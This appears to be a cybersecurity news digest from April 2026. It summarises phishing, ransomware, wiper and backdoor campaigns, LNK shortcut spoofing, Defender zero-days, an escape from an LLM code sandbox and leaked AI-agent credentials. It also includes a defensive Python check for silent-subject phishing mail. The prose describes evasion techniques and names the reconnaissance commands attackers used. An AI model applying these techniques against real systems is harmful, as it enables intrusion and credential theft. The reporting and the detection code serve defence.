Cybercriminal ecosystems have professionalized direct voice fraud ('vishing') via Caller-as-a-Service (CaaS) operations, structuring fraud as a scalable, role-divided business with real-time supervision, standardized recruitment, and performance-based compensation. These models leverage compromised data sources and human-centered social engineering to extract sensitive information or funds, often targeting English-speaking victims with high psychological pressure tactics. Operational characteristics include cryptocurrency-based recruitment incentives, OPSEC requirements, and live call monitoring to ensure script adherence and maximize conversion rates.

Stealth Phishing Campaign Leveraging Null Subject Emails and Legitimate RMM Tools Targets High-Value Users

Updated: · First: 22.04.2026 16:00 · 📰 1 src / 1 articles

A widespread stealth phishing campaign employing emails with missing subject lines (silent/null subject phishing) has escalated in Q1 2026, targeting executives and privileged users to facilitate initial access and potential lateral movement. Attackers bypass traditional email defenses by omitting subject lines to evade keyword-based and behavioral detection, while leveraging malicious links, QR codes, and legitimate remote monitoring and management (RMM) software such as Datto RMM under deceptive filenames. The campaign has grown by 13.9% between January and February 2026 and a further 7.0% in March, with sustained momentum projected. Impact includes credential harvesting, data exfiltration, and persistence within enterprise environments.
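The detail that matters for defenders is that the evasion is the absence of a Subject header, so any rule keyed on subject text never fires. The following is an added example, mine rather than anything from the report, of a mail-flow check that treats a missing, empty or whitespace-only Subject as a signal and raises severity only when the message also carries a delivery vehicle of the kind the entry describes (a link to, or attachment of, an installer-type file). It uses only the standard library; the sample message is constructed, and the list of installer extensions is my assumption.

```python
"""Added example (mine, not from the report): a mail-flow check for the
"silent subject" pattern the page describes, where a missing or empty Subject
header sidesteps keyword rules, combined with the traits named alongside it:
links to or attachments of installer-type files, as used to drop RMM tools
under deceptive names. Built on the standard library; the sample message is
constructed, and the installer extension list is my assumption.
"""
import re
from email import policy
from email.message import EmailMessage
from email.parser import Parser
from typing import Dict, List

INSTALLER_EXT = re.compile(r"(?i)\.(exe|msi|msix|zip|iso|img|lnk|bat|ps1|hta|js)$")
URL = re.compile(r"https?://[^\s<>\"']+")


def subject_is_silent(msg) -> bool:
    # Absent header, empty value and whitespace-only value are all "silent".
    subj = msg.get("Subject")
    return subj is None or not str(subj).strip()


def triage(raw: str) -> Dict[str, object]:
    msg = Parser(policy=policy.default).parsestr(raw)
    findings: List[str] = []
    if subject_is_silent(msg):
        findings.append("silent-subject")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if INSTALLER_EXT.search(name):
            findings.append(f"installer-attachment:{name}")
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    for url in URL.findall(text):
        if INSTALLER_EXT.search(url.rstrip(".,);")):
            findings.append(f"installer-link:{url}")
    # A silent subject alone is weak evidence; paired with a delivery vehicle
    # it is the campaign's signature.
    has_vehicle = any(f.startswith("installer-") for f in findings)
    severity = "high" if "silent-subject" in findings and has_vehicle else (
        "medium" if has_vehicle else ("low" if findings else "none"))
    return {"severity": severity, "findings": findings}


def build_sample(with_subject: bool = False) -> str:
    """Constructed message mimicking the campaign: no Subject, installer link and attachment."""
    m = EmailMessage()
    m["From"] = "IT Helpdesk <helpdesk@example.test>"
    m["To"] = "cfo@example.test"
    if with_subject:
        m["Subject"] = "Quarterly statement"
    m.set_content("Your statement is ready: https://files.example.test/Statement_Q1.msi")
    m.add_attachment(b"MZ\x90\x00", maintype="application",
                     subtype="octet-stream", filename="Statement_Q1.msi")
    return m.as_string()


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(build_sample(with_subject=True)))
```

`subject_is_silent` deliberately distinguishes nothing between "no header" and "Subject: " followed by spaces, because both defeat a subject-keyword rule equally; QR-code lures, which the entry also mentions, need image handling that this text-only check does not attempt.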

Microsoft Teams Efficiency Mode and Security Enhancements Rollout in May and June 2026

Updated: · First: 22.04.2026 15:24 · 📰 1 src / 1 articles

Microsoft will deploy an Efficiency Mode for Microsoft Teams targeting Windows and Mac desktops in May 2026, designed to enhance application responsiveness on hardware-constrained systems by dynamically adjusting video resolution and app behavior. The feature is enabled by default on eligible devices, with users able to opt out via application settings. Additionally, Microsoft will introduce new security reporting tools starting in June 2026, including end-user reporting for suspicious external users and a centralized Security Detection Report in the Teams admin center to surface messaging security detections such as impersonation attempts, malicious URLs, and weaponizable file types. Teams will also automatically tag third-party bots in meeting lobbies beginning next month to allow organizers to manage bot participation.

BlackCat Ransomware Affiliate Conspires with Former Negotiator to Target US Victims

Updated: · First: 22.04.2026 14:00 · 📰 1 src / 1 articles

A former ransomware negotiator pleaded guilty to conspiring with the BlackCat (ALPHV) ransomware group to extort multiple US victims between April 2023 and November 2023. Angelo Martino, 41, of Land O’Lakes, Florida, worked as a negotiator for incident response firm Digital Mint while secretly collaborating with BlackCat affiliates. He provided internal negotiation details, including insurance policy limits and victim positions, to maximize ransom demands. Martino also actively participated in deploying ransomware as an affiliate, alongside Ryan Goldberg of Georgia and Kevin Martin of Texas. Authorities seized $10 million in assets from Martino, including cryptocurrency, luxury vehicles, a food truck, and a fishing boat. Court documents indicate ransoms paid to the trio totaled at least $69 million across victims including a hospitality firm ($16.5m), a financial services firm ($25.7m), and a non-profit ($26.8m). Martino’s sentencing is scheduled for July 9, 2026, with a maximum penalty of 20 years imprisonment.

Lotus Wiper malware campaign disrupts Venezuelan energy and utilities sector with destructive file wiping

Updated: · First: 22.04.2026 13:55 · 📰 1 src / 1 articles

A previously undocumented file wiper malware named Lotus Wiper has been deployed in a destructive campaign targeting the energy and utilities sector in Venezuela, with activity spanning late 2025 and early 2026. The wiper systematically destroys system recovery mechanisms, overwrites physical drive contents, and deletes files across mounted volumes, rendering affected systems inoperable. No ransom or extortion demands were observed, indicating a non-financial motive. The attack chain involves multi-stage batch scripts that disable defenses, enumerate domain users, disable cached logins, disable network interfaces, and prepare the environment for wiper execution using native Windows utilities such as diskpart, robocopy, and fsutil.

Cross-application permission chaining risk exposed via AI agents and MCP connectors

Updated: · First: 22.04.2026 13:41 · 📰 1 src / 1 articles

On January 31, 2026, researchers disclosed an exposed database in Moltbook, a social network for AI agents, which leaked 35,000 email addresses and 1.5 million agent API tokens across 770,000 active agents. The database also contained plaintext third-party credentials, including OpenAI API keys, shared between agents in private messages, enabling attackers to hijack AI agents and their associated service integrations through unintended cross-application trust chains. The incident highlights the risk of "toxic combinations" of permissions, where AI agents, MCP servers, or OAuth integrations bridge multiple applications without explicit oversight from any single application owner, creating unauthorized lateral trust pathways that bypass conventional SaaS access reviews. These bridges form at runtime and are invisible to single-app governance, allowing credential exfiltration and command-and-control abuse when combined with weak token hygiene and runtime drift.

Microsoft Graph API regression disrupts Universal Print share creation via race condition

Updated: · First: 22.04.2026 13:15 · 📰 1 src / 1 articles

Microsoft has identified a regression in the Microsoft Graph API as the root cause of intermittent failures in Universal Print printer share creation, affecting Microsoft 365 customers using the cloud-based print management service. The issue, tracked as UP1287359, triggers "Sharing Print Failed" errors when users attempt to create printer shares with the "Allow all users in my organization" toggle enabled or when specific users or groups are selected. The underlying cause is a code change in Graph API that increased Entra ID directory replication latency, exposing a pre-existing race condition in the share creation flow. This disrupts retry logic, preventing share operations from completing as expected.

ProxySmart platform identified as core infrastructure for large-scale SIM farm operations worldwide

Updated: · First: 22.04.2026 13:00 · 📰 1 src / 1 articles

A Belarus-based software platform named ProxySmart has been identified as the operational backbone for over 90 SIM farms across 17 countries, enabling large-scale cybercrime and evasion activities. The end-to-end platform supports device management, automated IP rotation via cellular reconnection, remote control, and network fingerprint spoofing, marketed as a turnkey ‘SIM Farm as a Service’ solution accessible to non-technical operators. The infrastructure is used to facilitate activities including smishing, premium-rate fraud, bot sign-ups, OTP interception, and potential nation-state disinformation campaigns.

Linux GoGra backdoor leverages Microsoft Graph API for covert C2 via Outlook mailbox

Updated: · First: 22.04.2026 13:00 · 📰 1 src / 1 articles

A previously undocumented Linux variant of the GoGra backdoor, attributed to the state-backed Harvester espionage group, has been identified using legitimate Microsoft Graph API and Outlook mailboxes for stealthy command-and-control (C2) communications. The malware is delivered via fraudulent ELF executables masquerading as PDF files, establishes persistence via systemd and XDG autostart under the guise of the Conky system monitor, and retrieves base64-encoded, AES-CBC encrypted commands from a specific Outlook folder named “Zomato Pizza” with subject lines prefixed “Input.” Execution results are similarly encrypted and returned to the operator via reply emails labeled “Output,” with original command emails deleted to reduce forensic traces. The campaign targets telecommunications, government, and IT organizations in South Asia, indicating an expansion of Harvester’s operational scope and toolset to include Linux systems.

Escalating Nation-State Cyber Threat Landscape in the UK Amid Rapid AI Adoption

Updated: · First: 22.04.2026 11:07 · 📰 1 src / 1 articles

The UK faces a sustained and evolving cyber threat environment characterized by nation-state espionage, hybrid operations, and disruptive campaigns as AI-driven technological advancements exacerbate attack surfaces. Richard Horne, CEO of the NCSC, warned at CYBERUK 2026 that geopolitical tensions and rapid AI adoption are converging to create a ‘perfect storm’ of cyber risk. Nation-state actors—particularly China, Russia, and Iran—are employing increasingly sophisticated tactics, with China’s operations noted for their stealth and focus on edge infrastructure such as routers and VPNs. Russian threat activity is becoming more disciplined and militarized, while Iran is using cyber means to target British individuals perceived as regime threats, including via social media and destructive operations like the March 2025 Handala wiper attack on a UK NHS supplier. Despite a steady volume of nationally significant incidents, UK organizations are deemed underprepared due to budget constraints, immature security controls, and limited visibility, raising concerns about resilience against sustained state-sponsored assaults.

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

Updated: 22.04.2026 10:58 · First: 31.10.2025 13:29 · 📰 7 src / 8 articles

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, and the Netherlands, as well as Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers.

Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. Beukema documented four previously unknown techniques for manipulating Windows LNK shortcut files to hide malicious targets from users inspecting file properties. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique identified involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries. Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes.

CVE-2025-9491 was widely exploited by at least 11 state-sponsored groups and cybercrime gangs. Mustang Panda has expanded operations with a new LOTUSLITE backdoor variant targeting India's banking sector and South Korean/U.S. policy circles. The variant uses CHM files embedding malicious payloads, dynamic DNS C2 servers, and DLL side-loading to deliver remote shell access, file operations, and session management capabilities for espionage purposes.

Root-level sandbox escape in Cohere AI Terrarium via JavaScript prototype chain traversal

Updated: · First: 22.04.2026 10:16 · 📰 1 src / 1 articles

A critical sandbox escape vulnerability (CVE-2026-5752, CVSS 9.3) in Cohere AI’s Terrarium Python sandbox allows arbitrary code execution with root privileges on the host process through JavaScript prototype chain traversal in the Pyodide WebAssembly environment. Terrarium, a Docker-deployed sandbox for untrusted Python code, enables users to submit or generate code via LLMs and runs on Pyodide, supporting standard Python packages. Successful exploitation breaks out of the sandbox to execute system commands as root within the container, access sensitive files such as /etc/passwd, interact with other services on the container network, and potentially escape the container to escalate privileges. The flaw requires local access but no user interaction or special privileges, and no patch is expected as the project is no longer maintained.

Unpatched Microsoft SharePoint servers remain exposed to CVE-2026-32201 spoofing attacks

Updated: · First: 22.04.2026 09:53 · 📰 1 src / 1 articles

Over 1,300 Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability exploited as a zero-day and still actively abused in attacks. The flaw impacts SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, enabling threat actors without privileges to perform network spoofing via improper input validation. Exploitation can compromise confidentiality and integrity but does not restrict resource access. The issue was patched in April 2026 Patch Tuesday, added to CISA’s Known Exploited Vulnerabilities Catalog, and mandated for patching by U.S. federal agencies within two weeks. Fewer than 200 systems have been updated since the patch release.

Breach at French ANTS exposes citizen data; 19 million records advertised for sale

Updated: · First: 22.04.2026 00:46 · 📰 1 src / 1 articles

France Titres (Agence nationale des titres sécurisés, ANTS), the government agency under France’s Ministry of the Interior responsible for issuing identity documents, disclosed a security incident on April 15, 2026, affecting its ants.gouv.fr portal. An unidentified threat actor advertised a sale of up to 19 million records on April 16, claiming access to full names, contact details, birth data, home addresses, account metadata, and civil status information. ANTS confirmed exposure of login IDs, names, emails, dates of birth, unique account identifiers, and partial address and phone data for an undisclosed number of individuals. While ANTS states the incident does not enable unauthorized access to its portals, exposed data heightens phishing and social engineering risks. The agency is coordinating with CNIL, the Paris Public Prosecutor, and ANSSI and has advised vigilance against suspicious communications purportedly from ANTS.

Microsoft Defender zero-day exploits RedSun, BlueHammer, and UnDefend actively abused in the wild

Updated: 21.04.2026 22:12 · First: 16.04.2026 23:19 · 📰 2 src / 2 articles

Microsoft Defender is being actively abused in the wild using three proof-of-concept exploits—RedSun, BlueHammer (CVE-2026-33825), and UnDefend—released by researcher "Nightmare-Eclipse" after alleged poor responses from Microsoft Security Response Center (MSRC). RedSun and BlueHammer enable SYSTEM-level privilege escalation on fully patched Windows 10, 11, and Server 2019+ systems with Defender enabled, while UnDefend degrades Defender’s threat detection capabilities without triggering alerts. Attackers are staging binaries in low-noise directories and manually enumerating privileges before exploitation, reflecting targeted hands-on intrusions. Microsoft patched BlueHammer in April updates but has not addressed RedSun or UnDefend, which operate via separate flaws in Defender’s privileged file handling workflows.

Microsoft March and April 2026 Patch Tuesdays Address Multiple Zero-Days and Critical Flaws

Updated: 22.04.2026 11:08 · First: 10.03.2026 19:49 · 📰 13 src / 13 articles

Microsoft’s multi-month Patch Tuesday campaign continues with the April 2026 release addressing 167 security vulnerabilities in Windows and related software, including two actively exploited zero-days (CVE-2026-32201 in SharePoint Server and CVE-2026-33825 in Microsoft Defender). Nearly 60% of the patched flaws are elevation-of-privilege bugs, marking the highest proportion in eight months, while eight Critical vulnerabilities were addressed, including unauthenticated remote code execution flaws in Windows IKE Service Extensions (CVE-2026-33824, CVSS 9.8) and secure tunneling components (CVE-2026-33827, CVSS 8.1).

Following the April updates, threat actors are now exploiting two additional unpatched Microsoft Defender zero-days—RedSun and UnDefend—alongside the patched CVE-2026-33825 (BlueHammer). Exploitation activity has been observed since April 10, 2026, with RedSun and UnDefend PoCs deployed on April 16, 2026, featuring hands-on-keyboard techniques such as whoami /priv, cmdkey /list, and net group commands. Huntress confirmed real-world exploitation and took steps to isolate compromised systems to prevent post-exploitation damage. Threat actors have also been observed chaining these flaws with other vulnerabilities to achieve full endpoint control.

Microsoft issued out-of-band emergency patches for CVE-2026-40372, a critical ASP.NET Core privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw enables unauthenticated attackers to gain SYSTEM privileges by forging authentication cookies, stemming from a regression in Microsoft.AspNetCore.DataProtection 10.0.0-10.0.6 packages. Microsoft recommends updating to version 10.0.7 and rotating the DataProtection key ring to fully remediate.

The April updates were distributed through Windows 11 cumulative updates KB5083769 (for versions 25H2/24H2) and KB5082052 (for 23H2), changing build numbers to 26200.8246 (25H2), 26100.8246 (24H2), and 22631.6936 (23H2). Windows 10 Enterprise LTSC and ESU participants received the April fixes via KB5082200, updating to build 19045.7184 (Windows 10) or 19044.7184 (Windows 10 Enterprise LTSC 2021).